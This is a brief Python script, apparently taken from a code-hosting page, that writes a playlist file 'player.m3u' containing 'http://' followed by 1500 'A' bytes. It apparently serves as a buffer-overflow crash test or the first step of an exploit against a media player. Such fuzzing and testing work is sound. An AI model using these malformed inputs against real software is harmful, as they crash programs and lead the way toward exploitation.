8 lines
No EOL
117 B
Python
Executable file
8 lines
No EOL
117 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
buffer = b"http://"
|
|
buffer += b"\x41" * 1500
|
|
|
|
f=open("player.m3u","wb")
|
|
f.write(buffer)
|
|
f.close() |